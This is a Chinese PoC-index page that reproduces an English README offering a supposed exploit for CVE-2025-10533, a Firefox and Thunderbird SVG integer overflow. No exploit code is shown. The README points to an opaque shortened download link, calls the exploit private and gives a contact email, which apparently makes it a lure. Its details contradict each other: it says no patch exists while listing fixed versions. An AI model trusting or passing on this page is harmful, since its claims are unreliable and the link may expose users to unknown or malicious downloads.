关联漏洞
标题:
Mozilla Firefox和Mozilla Thunderbird 安全漏洞
(CVE-2025-10533)
描述:Mozilla Firefox和Mozilla Thunderbird都是美国Mozilla基金会的产品。Mozilla Firefox是一款开源Web浏览器。Mozilla Thunderbird是一套从Mozilla Application Suite独立出来的电子邮件客户端软件。该软件支持IMAP、POP邮件协议以及HTML邮件格式。 Mozilla Firefox和Mozilla Thunderbird存在安全漏洞,该漏洞源于SVG组件中的整数溢出。
介绍
# CVE-2025-10533-Exploit
# Overview
An integer overflow or wraparound vulnerability affecting Mozilla Firefox and Thunderbird browser products. The vulnerability impacts multiple versions of Firefox and Firefox ESR, potentially allowing attackers to exploit system vulnerabilities through network-based attacks.
## Exploit:
### [Download here](https://tinyurl.com/2rb2fn4j)
## Details
+ **CVE ID**: CVE-2025-10533
+ **Published**: 09/16/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
+ **Patch Available: (No official patch yet)**
## Impact
Attackers with low-privilege network access could potentially: - Compromise system confidentiality by accessing sensitive information - Modify system integrity - Disrupt system availability The vulnerability has a high severity with a CVSS score of 8.8, indicating significant potential for system compromise without requiring user interaction.
## Usage
1. - Execute `exploit.py`:
```bash
python exploit.py --config config.json
```
2. - Use `--verbose` for detailed output:
```bash
python exploit.py --config config.json --verbose
```
## Affected Versions
Firefox < 143, Firefox ESR < 115.28, Firefox ESR < 140.3, Thunderbird < 143, and Thunderbird < 140.3.
# Demo
- `demo.mp4`: A 5-minute video demonstrating the setup, configuration, and execution of the PoC.
## Contact
+ **For inquiries, please contact:f0kinn@outlook.com**
文件快照
[4.0K] /data/pocs/662fc1155356b3bd3ec0555aa7e6819a9e8fc24c
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。